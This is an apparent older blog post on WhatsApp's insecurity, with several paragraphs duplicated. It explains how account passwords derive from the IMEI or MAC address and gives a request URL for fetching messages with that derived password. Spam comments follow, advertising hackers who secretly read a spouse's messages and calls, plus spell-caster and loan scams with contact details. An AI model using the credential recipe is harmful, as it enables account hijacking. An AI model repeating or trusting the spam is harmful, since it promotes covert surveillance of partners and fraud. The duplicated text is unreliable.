Desktop IMs have long been our favorite mode of communication. But with time, their significance has definitely come down.
Smartphones taking large part of our daily life, IM services like Whatsapp, iMessage, BBM, etc have emerged to be exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, but yet, its the most insecure way of communication.
As per a recent security analysis, WhatsApp is totally insecure way of communicating with friends.
The local storage isn’t any different, you can checkout WhatsApp Database Encryption Project Report
WhatsApp uses customized XMPP server with proprietary extensions, named internally as FunXMPP.
1. WhatsApp Authentication / Login Mechanism
Just like any other XMPP, WhatsApp uses jabber id and password to login. The password is hashed, stored in servers upon account creation and used transparently everytime the client connects the server.
Its an incredibly horrible implementation. As researcher found out, the username is the user’s phone number – an attacker would probably already knows the victim’s number.
On Android, the password is a md5 hash of the reversed IMEI number: On iOS, the password is generated from the devices WLAN MAC address: Both IMEI and MAC address are easily retrievable from devices if you have physical access to it. MAC address is much easier to capture as you can sniff on the wireless network to which iOS device is connected.
The JID is a concatenation between your country’s code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
2. Text Message communication
Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s) along with Base64 thumbnail of media file (if applicable) along with the generated HTTP link as the message body.
Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. Not sure about “JID” and “NP” yet – if you have smart guess let me know. All this information is public.
Smartphones taking large part of our daily life, IM services like Whatsapp, iMessage, BBM, etc have emerged to be exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, but yet, its the most insecure way of communication.
As per a recent security analysis, WhatsApp is totally insecure way of communicating with friends.
WhatsApp Encryption
You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. That means if you were using Whatsapp on a public wifi, everything can be captured by anyone else sniffing ont he wireless network. The latest WhatsApp uses encryption but its this new encryption is broken. But still, phone number is sent out in plaintext.The local storage isn’t any different, you can checkout WhatsApp Database Encryption Project Report
WhatsApp API & Reverse Engineering
If you know XMPP, the same protocol used by facebook, GTalk, and several others, you can try your hands-onWhatsAPI, an API for WhatsApp messenger.WhatsApp uses customized XMPP server with proprietary extensions, named internally as FunXMPP.
1. WhatsApp Authentication / Login Mechanism
Just like any other XMPP, WhatsApp uses jabber id and password to login. The password is hashed, stored in servers upon account creation and used transparently everytime the client connects the server.
Its an incredibly horrible implementation. As researcher found out, the username is the user’s phone number – an attacker would probably already knows the victim’s number.
On Android, the password is a md5 hash of the reversed IMEI number: On iOS, the password is generated from the devices WLAN MAC address: Both IMEI and MAC address are easily retrievable from devices if you have physical access to it. MAC address is much easier to capture as you can sniff on the wireless network to which iOS device is connected.
The JID is a concatenation between your country’s code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password
$countrycode = the country calling code
$phonenumber = the users phone number
(without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC),
for Android use md5(strrev($imei))
The response you would receive would be in XML, containing messages designated for your phone.2. Text Message communication
Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s) along with Base64 thumbnail of media file (if applicable) along with the generated HTTP link as the message body.
WhatsApp Privacy Leak
WhatsApp shares your contacts with the server, we all know that. But the way it is done is ridiculously insecure. It basically sends contact information as:https://sro.whatsapp.net/client/iphone/iq.php
?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1
&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
.jpg)
.jpg)
*Do you suspect your partner (husband/wife/girlfriend/boyfriend) might be sneaking behind your back and having an affair?
ReplyDelete*Do you want to hack;
*Facebook, Twitter, Myspace, Instagram or any Social Media?
*Phone, Whatsapp, BBM
*Any Email
*Do you have an examination you want and you want the questions hacked and leaked to you before the examination?
*Do you want to hack into you university or college portal to change your grades/GPA?
*Do you need the service of a PI to help investigate someone online?
*Do you want to hack-proof yourself and protect your online accounts from being hacked?
CONTACT: benhacker127001@gmail.com
Nice post,Everyone , I just thought I’d let you know you can have a talented hacker get your jobs done for you(whatsapp,viber,texts,Facebook,monitor calls) , whatever you need done , reach him on cyberhacktivist1 AT gmail DOT com , , if you realize you have a cheating partner and just want to be more sure about the affair , he will get whatever you need done for you , he helped me once , i couldn’t be more grateful, i fell in love with an unfaithful man having TWO affairs, you can imagine how sickening that is, this fella helped me know about it all, reach him for whatever you need done. let him know thomas told you
ReplyDeletecontact cyberhacktivist1@gmail.com for hacking iCloud or jailbreaking your iPhone, he has helped me before so i trust his job and i can vouch for him, he can give you solution to any hacking service.
ReplyDeleteHi everyone,fix your broken relationship and marriage right now no matter how hopeless your situation seems!! I am so excited sharing my testimony with everyone here about how i saved my marriage and got my husband back after a divorce. I am Natasha Hayes by name and I'm a happily married to a lovely and caring husband ,with two kids.A very big problem occurred in my family seven months ago,between me and my husband .so terrible that he took the case to court for a divorce.he said that he never wanted to stay with me again,and that he didn't love me anymore.So he packed out of the house and made me and my children passed through severe pain. I tried all my possible means to get him back,after much begging,but all to no avail.and he confirmed it that he has made his decision,and he never wanted to see me again. So on one evening,as i was coming back from work,i met an old friend of mine who asked of my husband .So i explained every thing to him,so he told me that the only way i can get my husband back,is to visit a spell caster,because it has really worked for him too.So i never believed in spell,but i had no other choice,than to follow his advice. Then he gave me the email address of the spell caster whom he visited.{Unityspelltemple@gmail.com}. So the next morning,i sent a mail to the address he gave to me,and the spell caster assured me that i will get my husband back the next day.What an amazing statement!! I never believed,so he spoke with me,and told me everything that i need to do. Then the next morning, So surprisingly, my husband who didn't call me for the past{7}months,gave me a call to inform me that he was coming back.So Amazing!! So that was how he came back that same day,with lots of love and joy,and he apologized for his mistake,and for the pain he caused me and my children. Then from that day,our marriage was now stronger than how it were before,by the help of a spell caster Dr Unity. So, i will advice you out there, if you have any problem contact Dr Unity and i guarantee you that he will help you and you will be the next to share your testimony to every one in the world!!. Email him at: Unityspelltemple@gmail.com or call him on: +2348072370762.
ReplyDeleteI have been with a cheating spouse before and trust me I know how it feels, those suspicions are not mere paranoia. If you suspect that he is cheating, he might actually be..I hired a PI who helped me install monitoring bugs on his phone that diverted all his messages( facebook, whatsapp, text messages, and even phone calls) to my phone;(worldcyberhackers@gmail.com ) is the man for the job with a very high level of professionalism and highly reliable. I really enjoyed working with him and the few friends I told have been nothing but thankful to me for the referral.contact him through mail or Whatsapp +12678773020.
ReplyDeleteMy husband was so smooth at hiding his infidelity and I had no proof for months, I saw a recommendation about a Private investigator and decided to give him a try.. the result was incredible because all my cheating husbands text messages, whatsapp, facebook and his iphone conversations was sent directly to my Personal computer. Mr James helped me put a round-the-clock monitoring on him and I got concrete evidence and gave it to my lawyer..I say no to infidelity if your husband is an expert at hiding his cheating adventures contact him through Gmail he will help you(Worldcyberhackers) or WhatsApp : +12678773020
ReplyDelete
ReplyDeletebest hacker are you looking for the help of a hacker to help you hack
into your cheating spouse phone very fast
contact elizabethjone146@gmail.com
WhatsApp +18572012269
he is good at hacking and he has
also worked for me he helped me hack
into my spouse whats-app messages,call
logs,Facebook,text messages,viber,kik and
he also proved me with deleted text messages
from the past 6 months then i knew that i
have been staying under the same roof with
a big time cheat.thanks to him a lot he saved
me from my cheating spouse elizabethjone146@gmail.com
WhatsApp +18572012269
is reliable best hacker
I never thought I will come in contact with a real and potential hacker until I knew brillianthackers800 at Gmail and he delivered a professional job,he is intelligent and understanding to control jobs that comes his way
ReplyDeleteYou can message on his number +1(385) 2501115,
Contact him and be happy
I was so anxiuos to know what my husband was always doing late outside the house so i started contacting hackers and was scamed severly until i almost gave up then i contacted this one hacker and he delivered a good job showing evidences i needed from the apps on his phone like whatsapp,facebook,instagram and others and i went ahead to file my divorce papers with the evidences i got,He also went ahead to get me back some of my lost money i sent to those other fake hackers,every dollar i spent on these jobs was worth it.Contact him so he also help you.
ReplyDeletemail: premiumhackservices@gmail.com
text or call +1 4016006790
Do you need Personal Finance?
ReplyDeleteBusiness Cash Finance?
Unsecured Finance
Fast and Simple Finance?
Quick Application Process?
Finance. Services Rendered include,
*Debt Consolidation Finance
*Business Finance Services
*Personal Finance services Help
contact us today and get the best lending service
personal cash business cash just email us below
Contact Us: financialserviceoffer876@gmail.com
call or add us on what's app +918929509036